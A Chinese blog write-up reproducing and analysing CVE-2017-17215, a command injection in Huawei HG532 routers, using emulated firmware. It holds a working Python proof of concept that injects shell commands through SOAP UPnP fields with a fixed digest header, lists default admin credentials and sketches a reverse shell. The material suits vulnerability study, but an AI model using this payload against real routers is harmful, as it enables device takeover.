CVE-2017-17215 华为路由器远程命令执行漏洞复现与分析<\/h1>

漏洞概述<\/h2>
CVE-2017-17215是华为HG532系列路由器中存在的远程命令执行漏洞。该漏洞源于设备未对UPnP服务中的特殊函数入口进行有效过滤，攻击者可通过构造恶意SOAP请求实现任意命令执行。<\/p>
受影响产品<\/strong>：华为HG532系列路由器（家庭和小型办公用高速无线路由器）<\/p>
漏洞类型<\/strong>：远程命令执行<\/p>
漏洞原理<\/strong>：未对代码中可执行的特殊函数入口做过滤，导致攻击者可提交恶意构造的语句让服务器端执行。类似web应用中的system、eval、exec等函数未过滤用户输入的情况。<\/p>

环境准备<\/h2>
所需工具<\/h3>

binwalk：用于固件解压<\/li>
QEMU：用于模拟MIPS架构环境<\/li>
华为HG532固件：HG532eV100R001C01B020_upgrade_packet.bin<\/li>
Python requests库：用于发送POC<\/li> <\/ul>
固件解压<\/h3>

解压原始固件文件<\/li>
使用binwalk解压固件内容：<\/li> <\/ol>
binwalk -Me HG532eV100R001C01B020_upgrade_packet.bin <\/span><\/span><\/code><\/pre>解压后会得到squashfs-root<\/code>文件夹，包含路由器的文件系统。<\/p> QEMU环境搭建<\/h2> 安装依赖<\/h3> sudo apt-get install qemu <\/span><\/span>sudo apt-get install qemu binfmt-support qemu-user-static <\/span><\/span><\/code><\/pre>下载QEMU镜像<\/h3> 下载与固件匹配的MIPS 32位大端镜像：<\/p> wget https:\/\/people.debian.org\/~aurel32\/qemu\/mips\/debian_squeeze_mips_standard.qcow2 <\/span><\/span>wget https:\/\/people.debian.org\/~aurel32\/qemu\/mips\/vmlinux-2.6.32-5-4kc-malta <\/span><\/span><\/code><\/pre>配置网络<\/h3> 创建虚拟网桥：<\/li> <\/ol> sudo apt-get install bridge-utils <\/span><\/span>sudo brctl addbr Virbr0 <\/span><\/span>sudo ifconfig Virbr0 192.168.153.1\/24 up <\/span><\/span><\/code><\/pre> 创建tap接口并添加到网桥：<\/li> <\/ol> sudo tunctl -t tap0 <\/span><\/span>sudo ifconfig tap0 192.168.153.11\/24 up <\/span><\/span>sudo brctl addif Virbr0 tap0 <\/span><\/span><\/code><\/pre>启动虚拟机<\/h3> sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta \ <\/span><\/span><\/span><\/span>-hda debian_squeeze_mips_standard.qcow2 \ <\/span><\/span><\/span><\/span>-append "root=\/dev\/sda1 console=tty0"<\/span> \ <\/span><\/span><\/span><\/span>-netdev tap,id=<\/span>tapnet,ifname=<\/span>tap0,script=<\/span>no \ <\/span><\/span><\/span><\/span>-device rtl8139,netdev=<\/span>tapnet -nographic <\/span><\/span><\/code><\/pre>虚拟机内配置<\/h3> 设置IP地址：<\/li> <\/ol> ifconfig eth0 192.168.153.2\/24 up <\/span><\/span><\/code><\/pre> 将解压的文件系统复制到虚拟机：<\/li> <\/ol> scp -r squashfs-root\/ root@192.168.153.2:~\/ <\/span><\/span><\/code><\/pre> 挂载必要的目录：<\/li> <\/ol> mount -o bind \/dev .\/squashfs-root\/dev <\/span><\/span>mount -t proc \/proc .\/squashfs-root\/proc <\/span><\/span><\/code><\/pre> 启动chroot环境：<\/li> <\/ol> chroot squashfs-root sh <\/span><\/span><\/code><\/pre> 在另一个终端通过SSH连接并启动路由器服务：<\/li> <\/ol> ssh root@192.168.153.2 <\/span><\/span>chroot squashfs-root \/bin\/sh <\/span><\/span>.\/bin\/upnp <\/span><\/span>.\/bin\/mic <\/span><\/span><\/code><\/pre> 重新配置IP（因服务启动会改变网络配置）：<\/li> <\/ol> ifconfig eth0 192.168.153.2\/24 up <\/span><\/span>ifconfig br0 192.168.153.11\/24 up <\/span><\/span><\/code><\/pre>默认管理凭据<\/strong>：<\/p> 用户名：admin<\/li> 密码：@Hua1234<\/li> <\/ul> 漏洞复现<\/h2> POC代码<\/h3> import<\/span> requests <\/span><\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "Authorization"<\/span>: "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=\/ctrlt\/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>data =<\/span> '''<?xml version="1.0" ?> <\/span><\/span><\/span><s:Envelope xmlns:s="http:\/\/schemas.xmlsoap.org\/soap\/envelope\/" s:encodingStyle="http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"> <\/span><\/span><\/span><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"> <\/span><\/span><\/span><NewStatusURL>;mkdir \/bin\/hell;<\/NewStatusURL> <\/span><\/span><\/span><NewDownloadURL>HUAWEIUPNP<\/NewDownloadURL> <\/span><\/span><\/span><\/u:Upgrade> <\/span><\/span><\/span><\/s:Body> <\/span><\/span><\/span><\/s:Envelope> <\/span><\/span><\/span>'''<\/span> <\/span><\/span> <\/span><\/span>requests.<\/span>post('http:\/\/192.168.153.2:37215\/ctrlt\/DeviceUpgrade_1'<\/span>, headers=<\/span>headers, data=<\/span>data) <\/span><\/span><\/code><\/pre>漏洞利用说明<\/h3> 注入点在<NewStatusURL><\/code>和<NewDownloadURL><\/code>节点<\/li> 使用分号;<\/code>分隔命令<\/li> 示例中创建了\/bin\/hell<\/code>目录作为验证<\/li> <\/ul> 双注入点验证<\/h3> 修改POC，同时在两个节点注入命令：<\/p> data =<\/span> '''<?xml version="1.0" ?> <\/span><\/span><\/span><s:Envelope xmlns:s="http:\/\/schemas.xmlsoap.org\/soap\/envelope\/" s:encodingStyle="http:\/\/schemas.xmlsoap.org\/soap\/encoding\/"> <\/span><\/span><\/span><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"> <\/span><\/span><\/span><NewStatusURL>;mkdir hell;<\/NewStatusURL> <\/span><\/span><\/span><NewDownloadURL>;mkdir hello;<\/NewDownloadURL> <\/span><\/span><\/span><\/u:Upgrade> <\/span><\/span><\/span><\/s:Body> <\/span><\/span><\/span><\/s:Envelope> <\/span><\/span><\/span>'''<\/span> <\/span><\/span><\/code><\/pre>漏洞原理分析<\/h2> 关键代码分析<\/h3> 使用Ghidra分析二进制文件，搜索字符串"NewStatusURL"找到关键函数：<\/p> int<\/span> FUN_0040749c<\/span>(int<\/span> param_1) { <\/span><\/span> int<\/span> iVar1; <\/span><\/span> char<\/span> *<\/span>local_418; <\/span><\/span> char<\/span> *<\/span>local_414; <\/span><\/span> char<\/span> acStack1040[1028<\/span>]; <\/span><\/span> <\/span><\/span> iVar1 =<\/span> ATP_XML_GetChildNodeByName(*<\/span>(int<\/span> *<\/span>)(param_1 +<\/span> 0x2c<\/span>), "NewDownloadURL"<\/span>, (int<\/span> *<\/span>)0x0<\/span>, &<\/span>local_418); <\/span><\/span> if<\/span> (((iVar1 ==<\/span> 0<\/span>) &&<\/span> (local_418 !=<\/span> (char<\/span> *<\/span>)0x0<\/span>)) &&<\/span> <\/span><\/span> (iVar1 =<\/span> ATP_XML_GetChildNodeByName(*<\/span>(int<\/span> *<\/span>)(param_1 +<\/span> 0x2c<\/span>), "NewStatusURL"<\/span>, (int<\/span> *<\/span>)0x0<\/span>, &<\/span>local_414), iVar1 ==<\/span> 0<\/span>)) { <\/span><\/span> if<\/span> (local_414 !=<\/span> (char<\/span> *<\/span>)0x0<\/span>) { <\/span><\/span> snprintf(acStack1040, 0x400<\/span>, "upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -b"<\/span>, local_418, local_414); <\/span><\/span> system(acStack1040); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> return<\/span> iVar1; <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞形成原因<\/h3> 从XML中提取NewDownloadURL<\/code>和NewStatusURL<\/code>节点的内容<\/li> 使用snprintf<\/code>将这两个值拼接到命令字符串中<\/li> 通过system<\/code>函数执行拼接后的命令<\/li> 未对用户输入进行任何过滤，导致命令注入<\/li> <\/ol> UPnP服务分析<\/h3> 设备支持"DeviceUpgrade"服务<\/li> 通过向"\/ctrlt\/DeviceUpgrade_1"发送SOAP请求执行固件升级<\/li> 利用NewStatusURL<\/code>和NewDownloadURL<\/code>两个元素实现命令注入<\/li> <\/ul> 扩展思考<\/h2> 反弹Shell可能性<\/h3> 路由器环境中缺少常见工具如nc、python等<\/li> 可能的解决方案：交叉编译MIPS架构的客户端程序<\/li> 将客户端上传到路由器执行<\/li> 在攻击机上运行服务端<\/li> <\/ul> <\/li> <\/ol> 漏洞挖掘方法论<\/h3> 固件分析流程：<\/p> 获取并解压固件<\/li> 识别网络服务组件<\/li> 分析UPnP服务实现<\/li> 追踪用户输入处理流程<\/li> <\/ul> <\/li> 关键点：<\/p> 查找system等危险函数调用<\/li> 分析XML解析流程<\/li> 验证所有用户可控输入点<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> 原始分析文章：先知社区<\/li> CheckPoint漏洞报告<\/li> Huawei安全公告<\/li> <\/ul>